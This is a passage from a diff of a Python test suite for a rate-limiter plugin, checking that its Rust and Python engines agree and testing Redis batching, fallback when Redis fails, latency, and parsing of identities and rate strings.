-> list[bool]: - """Run n_requests through the Rust RateLimiterEngine; return allow decisions.""" - # First-Party - from plugins.rate_limiter.rate_limiter import RustRateLimiterEngine # noqa: PLC0415 - - engine = RustRateLimiterEngine({"by_user": f"{limit}/h", "algorithm": algorithm}) - window_nanos = 3600 * 1_000_000_000 # 1 hour in nanos - now_unix = int(time.time()) - results = [] - for _ in range(n_requests): - r = engine.evaluate_many([("user:test", limit, window_nanos)], now_unix) - results.append(r.allowed) - return results - - -@_skip_no_rust -def test_corr01_fixed_window_parity(): - """CORR-01: Rust fixed_window allow/block sequence matches Python.""" - limit = 5 - n = 8 # 5 allowed + 3 blocked - py = _python_sequence(ALGORITHM_FIXED_WINDOW, limit, n) - rs = _rust_sequence(ALGORITHM_FIXED_WINDOW, limit, n) - assert py == rs, f"Parity failure fixed_window: Python={py} Rust={rs}" - - -@_skip_no_rust -def test_corr01_token_bucket_parity(): - """CORR-01: Rust token_bucket allow/block sequence matches Python.""" - limit = 4 - n = 6 # 4 allowed + 2 blocked - py = _python_sequence(ALGORITHM_TOKEN_BUCKET, limit, n) - rs = _rust_sequence(ALGORITHM_TOKEN_BUCKET, limit, n) - assert py == rs, f"Parity failure token_bucket: Python={py} Rust={rs}" - - -@_skip_no_rust -def test_corr01_sliding_window_parity(): - """CORR-01: Rust sliding_window allow/block sequence matches Python.""" - limit = 3 - n = 5 # 3 allowed + 2 blocked - py = _python_sequence(ALGORITHM_SLIDING_WINDOW, limit, n) - rs = _rust_sequence(ALGORITHM_SLIDING_WINDOW, limit, n) - assert py == rs, f"Parity failure sliding_window: Python={py} Rust={rs}" - - -@_skip_no_rust -def test_corr01_remaining_count_parity_fixed_window(): - """CORR-01: remaining token count matches between Python and Rust (fixed_window).""" - # First-Party - from plugins.rate_limiter.rate_limiter import FixedWindowAlgorithm, MemoryBackend # noqa: PLC0415 - from plugins.rate_limiter.rate_limiter import RustRateLimiterEngine # noqa: PLC0415 - - limit = 10 - window_nanos = 3600 * 1_000_000_000 - now_unix = int(time.time()) - - py_backend = MemoryBackend(algorithm=FixedWindowAlgorithm()) - rust_engine = RustRateLimiterEngine({"by_user": f"{limit}/h", "algorithm": ALGORITHM_FIXED_WINDOW}) - - async def _py_remaining(n: int) -> int: - remaining = 0 - for _ in range(n): - _, _, _, meta = await py_backend.allow("user:test", f"{limit}/h") - remaining = meta.get("remaining", 0) - return remaining - - n_requests = 4 - py_remaining = asyncio.run(_py_remaining(n_requests)) - rs_result = None - for _ in range(n_requests): - rs_result = rust_engine.evaluate_many([("user:test", limit, window_nanos)], now_unix) - rs_remaining = rs_result.remaining - - assert py_remaining == rs_remaining, f"remaining mismatch after {n_requests} requests: Python={py_remaining} Rust={rs_remaining}" - - -@_skip_no_rust -@pytest.mark.parametrize("algorithm", [ALGORITHM_SLIDING_WINDOW, ALGORITHM_TOKEN_BUCKET]) -def test_corr01_remaining_count_parity_all_algorithms(algorithm): - """CORR-01: remaining count matches between Python and Rust for all algorithms.""" - # First-Party - from plugins.rate_limiter.rate_limiter import FixedWindowAlgorithm, MemoryBackend, RustRateLimiterEngine, SlidingWindowAlgorithm, TokenBucketAlgorithm # noqa: PLC0415 - - algo_map = { - ALGORITHM_FIXED_WINDOW: FixedWindowAlgorithm, - ALGORITHM_SLIDING_WINDOW: SlidingWindowAlgorithm, - ALGORITHM_TOKEN_BUCKET: TokenBucketAlgorithm, - } - limit = 10 - window_nanos = 3600 * 1_000_000_000 - now_unix = int(time.time()) - n_requests = 4 - - py_backend = MemoryBackend(algorithm=algo_map[algorithm]()) - rust_engine = RustRateLimiterEngine({"by_user": f"{limit}/h", "algorithm": algorithm}) - - async def _py_remaining() -> int: - remaining = 0 - for _ in range(n_requests): - _, _, _, meta = await py_backend.allow("user:test", f"{limit}/h") - remaining = meta.get("remaining", 0) - return remaining - - py_remaining = asyncio.run(_py_remaining()) - rs_result = None - for _ in range(n_requests): - rs_result = rust_engine.evaluate_many([("user:test", limit, window_nanos)], now_unix) - rs_remaining = rs_result.remaining - - assert py_remaining == rs_remaining, f"remaining mismatch ({algorithm}) after {n_requests} requests: Python={py_remaining} Rust={rs_remaining}" - - -@_skip_no_rust -def test_corr01_multi_dimension_parity(): - """CORR-01: Rust check() with 3 dimensions produces the same allow/block sequence as Python.""" - plugin_py = RateLimiterPlugin( - PluginConfig( - name="rl-parity-py", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={ - "by_user": "5/h", - "by_tenant": "10/h", - "by_tool": {"test_tool": "3/h"}, - "algorithm": ALGORITHM_FIXED_WINDOW, - }, - ) - ) - plugin_py._rust_engine = None # force Python path - - plugin_rs = RateLimiterPlugin( - PluginConfig( - name="rl-parity-rs", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={ - "by_user": "5/h", - "by_tenant": "10/h", - "by_tool": {"test_tool": "3/h"}, - "algorithm": ALGORITHM_FIXED_WINDOW, - }, - ) - ) - if plugin_rs._rust_engine is None: - pytest.skip("Rust engine not active") - - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - py_sequence: list[bool] = [] - rs_sequence: list[bool] = [] - - async def _run(): - # Tool limit is 3/h — requests 4+ should be blocked by the tool dimension - for i in range(6): - ctx = PluginContext(global_context=GlobalContext(request_id=f"parity-{i}", user="alice@example.com", tenant_id="acme")) - py_result = await plugin_py.tool_pre_invoke(payload, ctx) - rs_result = await plugin_rs.tool_pre_invoke(payload, ctx) - py_sequence.append(py_result.continue_processing) - rs_sequence.append(rs_result.continue_processing) - - asyncio.run(_run()) - assert py_sequence == rs_sequence, f"Multi-dimension parity failure: Python={py_sequence} Rust={rs_sequence}" - # First 3 allowed (tool limit), then 3 blocked - assert py_sequence == [True, True, True, False, False, False] - - -# --------------------------------------------------------------------------- -# Redis key format parity — Python RedisBackend vs Rust engine key generation -# -# These tests guard the dual Lua-script invariant: Python and Rust must -# produce identical Redis keys so that mixed deployments share counters. -# --------------------------------------------------------------------------- - - -@pytest.mark.parametrize( - "dimension,key,rate,expected_suffix", - [ - ("user", "user:alice@example.com", "30/m", "user:alice@example.com:60"), - ("tenant", "tenant:acme", "3000/m", "tenant:acme:60"), - ("tool", "tool:my_tool", "10/s", "tool:my_tool:1"), - ("user", "user:bob", "100/h", "user:bob:3600"), - ], - ids=["user-per-minute", "tenant-per-minute", "tool-per-second", "user-per-hour"], -) -def test_redis_key_format_parity_python_backend(dimension, key, rate, expected_suffix): - """Python RedisBackend key format matches the documented pattern: {prefix}:{dim_key}:{window_seconds}.""" - count, window_seconds = _parse_rate(rate) - prefix = "rl" - redis_key = f"{prefix}:{key}:{window_seconds}" - assert redis_key == f"rl:{expected_suffix}" - - -@pytest.mark.parametrize( - "user,tenant,tool,by_user,by_tenant,by_tool_cfg,expected_keys", - [ - ( - "alice@example.com", - "acme", - "summarize", - "30/m", - "3000/m", - {"summarize": "10/m"}, - ["user:alice@example.com", "tenant:acme", "tool:summarize"], - ), - ( - "bob", - None, - "search", - "30/m", - "3000/m", - {}, - ["user:bob"], - ), - ], - ids=["three-dimensions", "user-only-no-tenant-no-tool"], -) -def test_redis_key_format_parity_rust_dimension_keys(user, tenant, tool, by_user, by_tenant, by_tool_cfg, expected_keys): - """Rust engine dimension keys (built by _build_rust_checks) match Python path dimension keys.""" - plugin = RateLimiterPlugin( - PluginConfig( - name="key-parity", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={ - "by_user": by_user, - "by_tenant": by_tenant, - "by_tool": by_tool_cfg, - "algorithm": ALGORITHM_FIXED_WINDOW, - }, - ) - ) - - # Rust path dimension keys (built by Python wrapper, consumed by Rust engine) - if plugin._rust_engine is not None: - rust_checks = plugin._build_rust_checks(user, tenant, tool) - rust_dim_keys = [key for key, _count, _window in rust_checks] - else: - # If Rust engine not built, manually replicate the key construction - # to verify the pattern is consistent. - rust_dim_keys = [] - if plugin._cfg.by_user: - rust_dim_keys.append(f"user:{user}") - if tenant and plugin._cfg.by_tenant: - rust_dim_keys.append(f"tenant:{tenant}") - normalised = {k.strip().lower(): v for k, v in (by_tool_cfg or {}).items()} - if tool in normalised: - rust_dim_keys.append(f"tool:{tool}") - - # Python path dimension keys (built inside _check_rate_limit) - python_dim_keys = [] - if plugin._cfg.by_user: - python_dim_keys.append(f"user:{user}") - if tenant and plugin._cfg.by_tenant: - python_dim_keys.append(f"tenant:{tenant}") - if plugin._normalised_by_tool and tool in plugin._normalised_by_tool: - python_dim_keys.append(f"tool:{tool}") - - assert rust_dim_keys == python_dim_keys, f"Dimension key mismatch: Rust={rust_dim_keys} Python={python_dim_keys}" - assert rust_dim_keys == expected_keys - - -def test_redis_key_format_parity_window_seconds(): - """Both paths derive identical window_seconds from the same rate string.""" - for rate, expected_window in [("10/s", 1), ("30/m", 60), ("100/h", 3600)]: - count, window_secs = _parse_rate(rate) - # Python RedisBackend uses window_seconds directly from _parse_rate - python_window = window_secs - # Rust engine receives window_nanos and divides back to seconds for the key - window_nanos = window_secs * 1_000_000_000 - rust_window = window_nanos // 1_000_000_000 - assert python_window == rust_window, f"Window mismatch for {rate}: Python={python_window} Rust={rust_window}" - assert python_window == expected_window - - -def _normalise_lua(script: str) -> str: - """Collapse whitespace in a Lua script for content-level comparison.""" - return " ".join(script.split()) - - -@pytest.mark.parametrize( - "py_attr,rust_const_name", - [ - ("_LUA_BATCH_FIXED", "LUA_BATCH_FIXED"), - ("_LUA_BATCH_SLIDING", "LUA_BATCH_SLIDING"), - ("_LUA_BATCH_TOKEN_BUCKET", "LUA_BATCH_TOKEN_BUCKET"), - ], - ids=["batch-fixed", "batch-sliding", "batch-token-bucket"], -) -def test_redis_lua_script_content_parity(py_attr, rust_const_name): - """Batch Lua scripts in Python RedisBackend and Rust redis_backend.rs must be functionally identical. - - This prevents silent divergence: the key-format parity tests verify key naming - but not the Lua logic that runs inside Redis. If a script is changed in one - implementation it must be changed in the other for rolling-upgrade safety. - """ - # Standard - import pathlib # noqa: PLC0415 - import re # noqa: PLC0415 - - py_script = getattr(RedisBackend, py_attr) - - rust_src = pathlib.Path(__file__).resolve().parents[6] / "plugins_rust" / "rate_limiter" / "src" / "redis_backend.rs" - if not rust_src.exists(): - pytest.skip(f"Rust source not found at {rust_src}") - - rust_content = rust_src.read_text() - - # Extract the Rust constant by finding `const {name}: &str = r#"...content..."#;` - pattern = rf'const {rust_const_name}:\s*&str\s*=\s*r#"(.*?)"#;' - match = re.search(pattern, rust_content, re.DOTALL) - assert match is not None, f"Could not find const {rust_const_name} in {rust_src}" - rust_script = match.group(1) - - assert _normalise_lua(py_script) == _normalise_lua(rust_script), ( - f"Lua script content mismatch between Python RedisBackend.{py_attr} and Rust {rust_const_name}. " "Both must stay in sync for rolling-upgrade compatibility." - ) - - -# --------------------------------------------------------------------------- -# REDIS-02: EVALSHA used after SCRIPT LOAD; EVAL only as NOSCRIPT fallback -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -async def test_redis02_evalsha_used_after_script_load(): - """REDIS-02: script_load called once at first use; evalsha used on request path.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - mock_client = AsyncMock() - mock_client.script_load.return_value = "abc123sha" - mock_client.evalsha.return_value = [1, 60] # fixed window: count=1, ttl=60 - - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - _client=mock_client, - ) - - await backend.allow("user:alice", "10/s") - - # script_load must have been called (at least for _sha_fixed) - assert mock_client.script_load.called, "script_load must be called to cache SHA" - # evalsha must be used on the request path, not eval - assert mock_client.evalsha.called, "evalsha must be used after SHA is cached" - assert not mock_client.eval.called, "eval must NOT be called on the happy path" - - -@pytest.mark.asyncio -async def test_redis02_script_load_called_only_once_across_requests(): - """REDIS-02: script_load is called at most once — SHAs are cached after first load.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - mock_client = AsyncMock() - mock_client.script_load.return_value = "deadbeef" - mock_client.evalsha.return_value = [1, 60] - - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - _client=mock_client, - ) - - for _ in range(5): - await backend.allow("user:alice", "10/s") - - # script_load call count should be equal to the number of scripts (6), - # not 5 × 6 — it only runs until all SHAs are populated. - load_count = mock_client.script_load.call_count - assert load_count <= 6, f"script_load should be called at most once per script, got {load_count} calls" - - -@pytest.mark.asyncio -async def test_redis02_noscript_fallback_to_eval(): - """REDIS-02: NOSCRIPT error causes fallback to EVAL and SHA reload.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - # Third-Party - from redis.exceptions import ResponseError # noqa: PLC0415 - - mock_client = AsyncMock() - mock_client.script_load.return_value = "abc123" - # First evalsha raises NOSCRIPT; eval succeeds - mock_client.evalsha.side_effect = ResponseError("NOSCRIPT No matching script") - mock_client.eval.return_value = [1, 60] - - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - _client=mock_client, - ) - - result = await backend.allow("user:alice", "10/s") - allowed, *_ = result - - assert allowed is True, "NOSCRIPT fallback must still return a valid result" - assert mock_client.eval.called, "eval must be used as NOSCRIPT fallback" - - -# --------------------------------------------------------------------------- -# REDIS-04: Redis connection failure → fallback to MemoryBackend, no exception -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -async def test_redis04_connection_failure_falls_back_to_memory_allow(): - """REDIS-04: allow() falls back to MemoryBackend on Redis connection failure.""" - # First-Party - from plugins.rate_limiter.rate_limiter import FixedWindowAlgorithm # noqa: PLC0415 - - memory = MemoryBackend(algorithm=FixedWindowAlgorithm()) - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - fallback=memory, - ) - - # Inject a broken client — script_load raises immediately - class _Dead: - async def script_load(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - async def eval(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - async def evalsha(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - backend._client = _Dead() - - allowed, *_ = await backend.allow("user:alice", "10/s") - assert allowed is True, "Connection failure + fallback must allow the request" - - -@pytest.mark.asyncio -async def test_redis04_connection_failure_no_fallback_allows_gracefully(): - """REDIS-04: allow() fails open (allow) when Redis is down and no fallback is configured.""" - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - fallback=None, - ) - - class _Dead: - async def script_load(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - async def eval(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - async def evalsha(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - backend._client = _Dead() - - result = await backend.allow("user:alice", "10/s") - assert result is not None, "allow() must not raise on Redis failure" - allowed, *_ = result - assert allowed is True, "No-fallback path must fail open" - - -@pytest.mark.asyncio -async def test_redis04_allow_many_falls_back_to_memory_on_connection_failure(): - """REDIS-04: allow_many() falls back to per-call MemoryBackend when Redis is down.""" - # First-Party - from plugins.rate_limiter.rate_limiter import FixedWindowAlgorithm # noqa: PLC0415 - - memory = MemoryBackend(algorithm=FixedWindowAlgorithm()) - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - fallback=memory, - ) - - class _Dead: - async def script_load(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - async def eval(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - async def evalsha(self, *a: Any, **kw: Any) -> None: - raise ConnectionError("Redis is down") - - backend._client = _Dead() - - checks = [("user:alice", "10/s"), ("tenant:acme", "100/s")] - results = await backend.allow_many(checks) - - assert len(results) == 2, "allow_many must return one result per check" - assert all(r[0] is True for r in results), "All dimensions must be allowed via memory fallback" - - -# --------------------------------------------------------------------------- -# PERF-05: at most one Redis network round-trip per hook invocation -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -async def test_perf05_single_round_trip_per_hook_one_dim(): - """PERF-05: one dimension → one evalsha call.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - mock_client = AsyncMock() - mock_client.script_load.return_value = "sha1" - mock_client.evalsha.return_value = [[1, 60]] - - plugin = _mk_redis_plugin({"by_user": "10/s"}) - plugin._rate_backend._client = mock_client - # Pre-populate SHAs so evalsha is used directly - plugin._rate_backend._sha_batch_fixed = "sha1" - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="search", arguments={}) - await plugin.tool_pre_invoke(payload, ctx) - - total_calls = mock_client.evalsha.call_count + mock_client.eval.call_count - assert total_calls <= 1, f"PERF-05: expected ≤1 Redis call for 1 dimension, got {total_calls}" - - -@pytest.mark.asyncio -async def test_perf05_single_round_trip_per_hook_three_dims(): - """PERF-05: three dimensions (user + tenant + tool) → still one evalsha call.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - mock_client = AsyncMock() - mock_client.script_load.return_value = "sha1" - mock_client.evalsha.return_value = [[1, 60], [1, 60], [1, 60]] - - plugin = _mk_redis_plugin({"by_user": "10/s", "by_tenant": "100/s", "by_tool": {"search": "5/s"}}) - plugin._rate_backend._client = mock_client - plugin._rate_backend._sha_batch_fixed = "sha1" - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="acme")) - payload = ToolPreInvokePayload(name="search", arguments={}) - await plugin.tool_pre_invoke(payload, ctx) - - total_calls = mock_client.evalsha.call_count + mock_client.eval.call_count - assert total_calls <= 1, f"PERF-05: expected ≤1 Redis call for 3 dimensions, got {total_calls} — " f"all dimensions must be batched into a single round-trip" - - -# --------------------------------------------------------------------------- -# PERF-03: p99 latency — Rust path must not regress vs Python memory backend -# --------------------------------------------------------------------------- - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_perf03_rust_p99_does_not_regress_vs_python(): - """PERF-03: p99 latency of Rust evaluate_many() must be ≤ Python MemoryBackend.allow() p99. - - Runs 1000 requests through each path concurrently (100 at a time) and - compares p99 wall-clock latency. The Rust path is expected to be faster; - if it is somehow slower the test fails with a diagnostic message. - """ - # First-Party - from plugins.rate_limiter.rate_limiter import FixedWindowAlgorithm # noqa: PLC0415 - - CONCURRENCY = 100 - TOTAL = 1000 - LIMIT = TOTAL * 10 # never block during the benchmark - WINDOW_NANOS = 3600 * 1_000_000_000 - - # --- Python path --- - py_backend = MemoryBackend(algorithm=FixedWindowAlgorithm()) - - async def _py_call() -> float: - t0 = time.perf_counter() - await py_backend.allow("user:bench", f"{LIMIT}/h") - return time.perf_counter() - t0 - - sem = asyncio.Semaphore(CONCURRENCY) - - async def _bounded_py() -> float: - async with sem: - return await _py_call() - - py_times = await asyncio.gather(*[_bounded_py() for _ in range(TOTAL)]) - py_p99 = sorted(py_times)[int(0.99 * TOTAL)] - - # --- Rust path --- - rust_engine = RustRateLimiterEngine({"by_user": f"{LIMIT}/h", "algorithm": ALGORITHM_FIXED_WINDOW}) - now_unix = int(time.time()) - - async def _rust_call() -> float: - t0 = time.perf_counter() - rust_engine.evaluate_many([("user:bench", LIMIT, WINDOW_NANOS)], now_unix) - return time.perf_counter() - t0 - - async def _bounded_rust() -> float: - async with sem: - return await _rust_call() - - rust_times = await asyncio.gather(*[_bounded_rust() for _ in range(TOTAL)]) - rust_p99 = sorted(rust_times)[int(0.99 * TOTAL)] - - # Rust p99 must be ≤ Python p99 (Rust should be faster, never slower) - assert rust_p99 <= py_p99, f"PERF-03: Rust p99 ({rust_p99*1e6:.1f} µs) regressed vs Python p99 ({py_p99*1e6:.1f} µs)" - - -# --------------------------------------------------------------------------- -# PERF-02: Python wrapper overhead is small relative to Rust engine time -# --------------------------------------------------------------------------- - - -@_skip_no_rust -def test_perf02_wrapper_overhead_is_small(): - """PERF-02: Python wrapper overhead (context extraction + PyO3 call) must be < 10× Rust engine time. - - Measures wrapper-only cost by mocking evaluate_many() to return instantly, - then compares against real Rust engine time. The wrapper must not dominate. - """ - ITERATIONS = 10_000 - LIMIT = 1_000_000 - WINDOW_NANOS = 3600 * 1_000_000_000 - now_unix = int(time.time()) - - class _FakeEvalResult: - allowed = True - limit = LIMIT - remaining = LIMIT - 1 - reset_timestamp = now_unix + 3600 - retry_after = None - - fake_result = _FakeEvalResult() - - # --- Wrapper-only overhead (mocked Rust engine) --- - plugin = _mk_rust(f"{LIMIT}/h") - assert plugin._rust_engine is not None - - wrapper_times = [] - original_evaluate_many = plugin._rust_engine.evaluate_many - plugin._rust_engine.evaluate_many = lambda checks, ts: fake_result - try: - checks = plugin._build_rust_checks("alice", None, "search") - for _ in range(ITERATIONS): - t0 = time.perf_counter_ns() - plugin._rust_engine.evaluate_many(checks, now_unix) - wrapper_times.append(time.perf_counter_ns() - t0) - finally: - plugin._rust_engine.evaluate_many = original_evaluate_many - - # --- Real Rust engine (no wrapper) --- - engine = RustRateLimiterEngine({"by_user": f"{LIMIT}/h", "algorithm": ALGORITHM_FIXED_WINDOW}) - rust_times = [] - for _ in range(ITERATIONS): - t0 = time.perf_counter_ns() - engine.evaluate_many([("user:alice", LIMIT, WINDOW_NANOS)], now_unix) - rust_times.append(time.perf_counter_ns() - t0) - - wrapper_median = sorted(wrapper_times)[ITERATIONS // 2] - rust_median = sorted(rust_times)[ITERATIONS // 2] - - # Wrapper overhead must be < 10× the Rust engine time - assert wrapper_median < rust_median * 10, f"PERF-02: wrapper overhead ({wrapper_median} ns median) is ≥10× Rust engine " f"({rust_median} ns median) — wrapper is dominating" - - -# --------------------------------------------------------------------------- -# MEM-06: Dimension keys are distinct — same name in different dims never collide -# --------------------------------------------------------------------------- - - -@_skip_no_rust -def test_mem06_user_tenant_tool_keys_are_distinct(): - """MEM-06: 'alice' as user, tenant, and tool must produce independent counters. - - Verifies that the key namespace (user:, tenant:, tool:) prevents hash collision - between the same identifier used across different dimensions. - """ - LIMIT = 2 - WINDOW_NANOS = 3600 * 1_000_000_000 - now_unix = int(time.time()) - engine = RustRateLimiterEngine({"by_user": f"{LIMIT}/h", "algorithm": ALGORITHM_FIXED_WINDOW}) - - # Exhaust the user:alice counter - engine.evaluate_many([("user:alice", LIMIT, WINDOW_NANOS)], now_unix) - engine.evaluate_many([("user:alice", LIMIT, WINDOW_NANOS)], now_unix) - blocked = engine.evaluate_many([("user:alice", LIMIT, WINDOW_NANOS)], now_unix) - assert not blocked.allowed, "user:alice counter should be exhausted" - - # tenant:alice and tool:alice must still have independent counters - r_tenant = engine.evaluate_many([("tenant:alice", LIMIT, WINDOW_NANOS)], now_unix) - r_tool = engine.evaluate_many([("tool:alice", LIMIT, WINDOW_NANOS)], now_unix) - - assert r_tenant.allowed, "tenant:alice must be independent from user:alice" - assert r_tool.allowed, "tool:alice must be independent from user:alice" - - -# --------------------------------------------------------------------------- -# TokenBucketAlgorithm.sweep() (14a) -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -async def test_token_bucket_sweep_evicts_inactive_buckets(): - """TokenBucketAlgorithm.sweep() should evict buckets that have been inactive for >1 hour.""" - algo = TokenBucketAlgorithm() - lock = asyncio.Lock() - - # Create a bucket by issuing a request. - await algo.allow(lock, "user:stale", 10, 60) - assert "user:stale" in algo._store - - # Manually backdate last_refill to >1 hour ago. - algo._store["user:stale"].last_refill -= 3601 - - await algo.sweep(lock) - assert "user:stale" not in algo._store, "Bucket inactive for >1 hour must be evicted by sweep" - - -@pytest.mark.asyncio -async def test_token_bucket_sweep_keeps_active_buckets(): - """TokenBucketAlgorithm.sweep() should keep recently-used buckets.""" - algo = TokenBucketAlgorithm() - lock = asyncio.Lock() - - await algo.allow(lock, "user:active", 10, 60) - assert "user:active" in algo._store - - await algo.sweep(lock) - assert "user:active" in algo._store, "Recently-used bucket must not be evicted" - - -# --------------------------------------------------------------------------- -# _extract_user_identity dict fallback chain (14d) -# --------------------------------------------------------------------------- - - -def test_extract_user_identity_dict_email(): - """Dict with 'email' key should use email as identity.""" - assert _extract_user_identity({"email": "alice@example.com"}) == "alice@example.com" - - -def test_extract_user_identity_dict_id_fallback(): - """Dict without 'email' should fall back to 'id'.""" - assert _extract_user_identity({"id": "user-123"}) == "user-123" - - -def test_extract_user_identity_dict_sub_fallback(): - """Dict without 'email' or 'id' should fall back to 'sub'.""" - assert _extract_user_identity({"sub": "sub-456"}) == "sub-456" - - -def test_extract_user_identity_dict_empty_email_falls_to_id(): - """Dict with empty 'email' should fall back to 'id'.""" - assert _extract_user_identity({"email": "", "id": "user-789"}) == "user-789" - - -def test_extract_user_identity_dict_all_empty_is_anonymous(): - """Dict with all falsy identity fields should return 'anonymous'.""" - assert _extract_user_identity({"email": "", "id": "", "sub": ""}) == "anonymous" - - -def test_extract_user_identity_dict_no_keys_is_anonymous(): - """Dict with no identity keys should return 'anonymous'.""" - assert _extract_user_identity({"roles": ["admin"]}) == "anonymous" - - -def test_extract_user_identity_colons_replaced(): - """Colons in identities must be replaced to prevent key-namespace collisions.""" - assert _extract_user_identity({"sub": "auth0|user:12345"}) == "auth0|user_12345" - assert _extract_user_identity({"email": "urn:user:alice"}) == "urn_user_alice" - assert _extract_user_identity("colon:in:string") == "colon_in_string" - - -# --------------------------------------------------------------------------- -# prompt_pre_fetch Rust async Redis path (14f) -# --------------------------------------------------------------------------- - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch01_redis_rust_prompt_uses_async_entrypoint(): - """Redis-backed Rust path should await check_async for prompt_pre_fetch.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[PromptHookType.PROMPT_PRE_FETCH], - config={"by_user": "10/s", "backend": "redis", "redis_url": "redis://localhost:6379/0"}, - ) - ) - if plugin._rust_engine is None: - pytest.skip("Rust engine not active") - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = PromptPrehookPayload(prompt_id="search") - - sync_mock = patch.object(plugin._rust_engine, "check", wraps=plugin._rust_engine.check) - async_mock = patch.object(plugin._rust_engine, "check_async", AsyncMock(wraps=plugin._rust_engine.check_async)) - with sync_mock as mock_sync, async_mock as mock_async: - await plugin.prompt_pre_fetch(payload, ctx) - assert mock_async.await_count == 1, "prompt_pre_fetch must use async entrypoint for Redis" - assert mock_sync.call_count == 0, "prompt_pre_fetch must not use sync entrypoint for Redis" - - -# ============================================================================ -# Sliding window Retry-After regression -# ============================================================================ - - -@pytest.mark.asyncio -async def test_sliding_window_retry_after_never_zero_when_blocked(): - """Retry-After (reset_in) must be >= 1 when the request is blocked. - - Regression: int truncation of (oldest_ts + window - now) could produce 0 - when the oldest timestamp + window rounded down to int(now). - """ - algorithm = SlidingWindowAlgorithm() - lock = asyncio.Lock() - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - # Place a request at a fractional timestamp - mock_time.time.return_value = 1000.1 - await algorithm.allow(lock, "user:x", 1, 1) # consume limit - - # At t=1000.9: oldest=1000.1, reset_timestamp=int(1001.1)=1001, - # reset_in = int(1001 - 1000.9) = int(0.1) = 0 WITHOUT the fix. - mock_time.time.return_value = 1000.9 - allowed, _, _, meta = await algorithm.allow(lock, "user:x", 1, 1) - - assert allowed is False - assert meta["reset_in"] >= 1, f"Retry-After must be >= 1 when blocked, got {meta['reset_in']}" - - -# ============================================================================ -# Token bucket first-request memory/Redis parity -# ============================================================================ - - -@pytest.mark.asyncio -async def test_token_bucket_first_request_reset_in_matches_refill_rate(): - """First-request reset_in must reflect tokens_needed/refill_rate, not the full window. - - Regression: memory path hard-coded time_to_full=window on first request, - while Redis derived it from tokens_needed/refill_rate, causing metadata - divergence between backends. - """ - algorithm = TokenBucketAlgorithm() - lock = asyncio.Lock() - - # 10/m → refill_rate = 10/60 ≈ 0.167 tok/s - # After first request: tokens_needed = 1, time_to_full = 1/0.167 ≈ 6 - allowed, count, reset_ts, meta = await algorithm.allow(lock, "user:y", 10, 60) - - assert allowed is True - assert meta["remaining"] == 9 - # Must NOT be 60 (the full window) — should be ~6 (1 token / refill_rate) - assert meta["reset_in"] < 60, f"First-request reset_in should reflect tokens_needed/refill_rate, " f"not the full window. Got {meta['reset_in']}, expected ~6" - assert meta["reset_in"] >= 1, "reset_in must be at least 1" - - -# --------------------------------------------------------------------------- -# RATE_LIMITER_FORCE_PYTHON env var (review finding #17) -# --------------------------------------------------------------------------- - - -def test_force_python_env_var_disables_rust(): - """Setting RATE_LIMITER_FORCE_PYTHON=1 must force _RUST_AVAILABLE to False.""" - # Standard - import importlib # noqa: PLC0415 - - # First-Party - import plugins.rate_limiter.rate_limiter as rl_mod # noqa: PLC0415 - - with patch.dict(os.environ, {"RATE_LIMITER_FORCE_PYTHON": "1"}): - importlib.reload(rl_mod) - assert rl_mod._RUST_AVAILABLE is False - - # Restore: reload without the env override so other tests are unaffected. - with patch.dict(os.environ, {}, clear=False): - os.environ.pop("RATE_LIMITER_FORCE_PYTHON", None) - importlib.reload(rl_mod) - - -# --------------------------------------------------------------------------- -# Edge-case rate string validation (review findings) -# --------------------------------------------------------------------------- - - -def test_parse_rate_zero_count_raises(): - """Zero-count rate string must raise ValueError — ambiguous semantics.""" - with pytest.raises(ValueError): - _parse_rate("0/s") - - -def test_parse_rate_negative_count_raises(): - """Negative count rate string must raise ValueError.""" - with pytest.raises(ValueError): - _parse_rate("-5/s") - - -def test_parse_rate_missing_slash_raises(): - """Malformed rate string without a slash must raise 